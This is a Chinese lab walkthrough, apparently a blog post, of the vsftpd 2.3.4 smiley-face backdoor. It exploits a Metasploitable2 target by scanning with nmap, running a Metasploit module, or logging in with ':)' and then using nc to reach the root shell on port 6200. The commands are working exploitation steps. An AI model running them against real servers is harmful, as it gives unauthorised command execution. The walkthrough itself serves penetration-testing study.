vsftpd2.3.4 后门笑脸漏洞
漏洞概要
在vsftpd 2.3.4
版本中,在登录输入用户名时输入:)
类似于笑脸的符号,会导致服务处理开启6200
后门端口,直接执行系统命令
漏洞利用
攻击机:kali 2022
msfconsole利用或者nc连接后门端口利用
靶机: Metasploitable2-Linux,这是一个集成了很多漏洞的平台
msfconsole利用
首先使用nmap进行目标版本服务进行扫描
靶机IP为:172.16.1.104
nmap -sV -p- -n 172.16.1.104
开启msfconsole利用平台进行漏洞利用
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.1.104
run
漏洞利用成功,再利用成功后我们终端显示的非常难受,可以执行python命令获取一个虚拟终端
python -c "import pty;pty.spawn('/bin/sh')"
ftp直接连接服务,nc连接6200后门端口
使用ftp 172.16.1.104
连接靶机,用户名输入任意用户名加:)
,例如root:)
密码随便输入
打开一个终端使用nc进行连接
nc 172.16.1.104 6200
漏洞利用成功
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· Vue3状态管理终极指南:Pinia保姆级教程